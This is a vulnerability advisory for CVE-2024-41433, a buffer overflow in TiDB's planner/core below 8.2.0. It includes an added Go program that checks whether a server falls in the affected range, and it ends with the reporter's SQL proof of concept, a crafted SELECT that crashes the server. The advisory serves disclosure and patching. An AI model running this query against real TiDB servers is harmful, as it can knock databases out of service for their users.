Buffer Overflow Affecting github.com/pingcap/tidb/pkg/planner/core package, versions <8.2.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (11th percentile)
- Snyk ID SNYK-GOLANG-GITHUBCOMPINGCAPTIDBPKGPLANNERCORE-7888177
- published 4 Sep 2024
- disclosed 3 Sep 2024
- credit r33s3n6
Introduced: 3 Sep 2024
CVE-2024-41433
How to fix?
Upgrade github.com/pingcap/tidb/pkg/planner/core to version 8.2.0 or higher.
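Added check, not part of the Snyk advisory or of the TiDB project's own code: a small Go program that decides whether a running TiDB server falls inside the affected range by parsing the text returned by `SELECT tidb_version()`. The only fact taken from the advisory is the 8.2.0 cutoff; the "Release Version: vX.Y.Z" line format is assumed (compare it against your own server's output), and the sample output embedded below is constructed, not captured from a real server. A pre-release build of 8.2.0 (for example v8.2.0-alpha) is deliberately reported as affected, because it sorts before the final release and cannot be assumed to carry the fix.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// fixedVersion is the first patched release named in the advisory (8.2.0).
var fixedVersion = [3]int{8, 2, 0}

// releaseVersionRe matches the "Release Version: v8.1.0" line that
// SELECT tidb_version() prints. The line format is an assumption here;
// verify it against your own server before relying on this check.
var releaseVersionRe = regexp.MustCompile(`(?m)^Release Version:\s*v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?`)

// parseVersion extracts MAJOR.MINOR.PATCH and any pre-release suffix from the
// tidb_version() text. It returns an error when no version line is present.
func parseVersion(tidbVersionOutput string) (v [3]int, pre string, err error) {
	m := releaseVersionRe.FindStringSubmatch(tidbVersionOutput)
	if m == nil {
		return v, "", errors.New("no 'Release Version' line found in tidb_version() output")
	}
	for i := 0; i < 3; i++ {
		n, convErr := strconv.Atoi(m[i+1])
		if convErr != nil {
			return v, "", convErr
		}
		v[i] = n
	}
	return v, strings.TrimPrefix(m[4], "-"), nil
}

// compare returns -1, 0 or 1 as a is less than, equal to or greater than b,
// comparing major, then minor, then patch numerically.
func compare(a, b [3]int) int {
	for i := 0; i < 3; i++ {
		switch {
		case a[i] < b[i]:
			return -1
		case a[i] > b[i]:
			return 1
		}
	}
	return 0
}

// IsAffected reports whether the server described by tidb_version() output is
// in the advisory's affected range (< 8.2.0). A pre-release of the fix version
// itself is treated as affected, since it precedes the final 8.2.0 release.
func IsAffected(tidbVersionOutput string) (bool, error) {
	v, pre, err := parseVersion(tidbVersionOutput)
	if err != nil {
		return false, err
	}
	c := compare(v, fixedVersion)
	if c < 0 {
		return true, nil
	}
	if c == 0 && pre != "" {
		return true, nil
	}
	return false, nil
}

// sampleOutput is a constructed tidb_version() result for illustration only;
// it was not captured from a real server.
const sampleOutput = `Release Version: v8.1.0
Edition: Community
Git Commit Hash: 0000000000000000000000000000000000000000
Git Branch: HEAD
UTC Build Time: 2024-05-01 00:00:00
GoVersion: go1.21.10
Race Enabled: false
Check Table Before Drop: false
Store: tikv`

func main() {
	affected, err := IsAffected(sampleOutput)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("affected by CVE-2024-41433 (planner/core < 8.2.0): %v\n", affected)
}
```

In practice you would feed IsAffected the string returned by running `SELECT tidb_version()` against each server through a MySQL-protocol client; the function itself needs no database connection, so it can be unit-tested and dropped into an inventory script.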
Overview
Affected versions of this package are vulnerable to Buffer Overflow via the component expression.ExplainExpressionList. An attacker who can issue SQL statements to the server can disrupt service (denial of service) by sending specially crafted input. The proof of concept below reproduces the issue with a single crafted SELECT; note that it sets a TiFlash replica on the table and, per the reporter's note, the replica must have had time to become available before the final query is run, or the bug may not trigger.
PoC
-- Table used by the proof of concept: non-clustered primary key, sharded
-- row IDs and pre-split regions, exactly as in the original report.
create table t_ldpj7bp (
c_w_jr14qm2 int ,
c_t3nd927 int ,
c_ts int ,
c_s text ,
c_qchmg double ,
c_r int ,
c_olb3fsg6 text ,
c_zkbe tinyint ,
primary key(c_w_jr14qm2) NONCLUSTERED) shard_row_id_bits=8 pre_split_regions=5;
-- sql #267
-- A TiFlash replica is part of the reproduction; it needs time to become
-- available before the final SELECT (see the note further down).
alter table t_ldpj7bp set tiflash replica 1;
-- Seed rows. The values are the reporter's fuzzer-generated expressions
-- (NULL casts, IN lists, boolean casts) and are kept unchanged.
insert into t_ldpj7bp (c_w_jr14qm2, c_t3nd927, c_ts, c_s, c_qchmg, c_r, c_olb3fsg6, c_zkbe) values
(730552758, -682774206, 1698439632, 'lrvil359', 18446744073709551616.5, cast(cast(null as signed) as signed), 'oj1', (-1367510804 in (2123597870, 1485484027))),
(-1001332962, -1396443960, cast(cast(null as signed) as signed), 'e43lh', 15.54, -1568307927, 'i', (-1162033997 not in (-1850570375, -781179836, -1281662147, -431391092, cast(null as signed)))),
(-727295464, 1998529670, -1873237194, 'lps56o', 70.81, 1380690610, cast(null as char), ((NOT NOT(cast( (cast(cast(null as signed) as signed) && cast(2536017375093623800 as signed)) as unsigned))))
and ((NOT NOT(cast( (cast(2051320819 as signed) <=> cast(-8632453786780487783 as signed)) as unsigned))))),
(2133408768, 736339957, -1486317339, 'f', 62.97, -1444096406, 'tj', (NOT NOT(cast( (cast(cast(null as char) as char) = cast(cast(null as char) as char)) as unsigned))));
-- [[NOTE]] please wait a while before executing the following sql, otherwise the bug may not be triggered.
-- Crafted query: a correlated EXISTS subquery (it references ref_0.c_t3nd927
-- from the outer table) that selects a constant from a derived table and
-- carries its own ORDER BY, wrapped in an outer ORDER BY ... LIMIT.
SELECT
ref_0.c_t3nd927 as c2
FROM
t_ldpj7bp as ref_0
WHERE
(EXISTS (
select distinct
cast(cast(null as signed) as signed) as c0
from
(select
ref_1.c_w_jr14qm2 as c0,
ref_1.c_ts as c1
from
t_ldpj7bp as ref_1
where (NOT NOT(cast( (cast(2147483648.100000 as double) || cast(78.5 as double)) as unsigned)))) as subq_0
where (NOT NOT(cast( (cast(ref_0.c_t3nd927 as signed) <> cast(-2308981195293685378 as signed)) as unsigned)))
order by c0 desc))
ORDER BY
c2 ASC
LIMIT 55;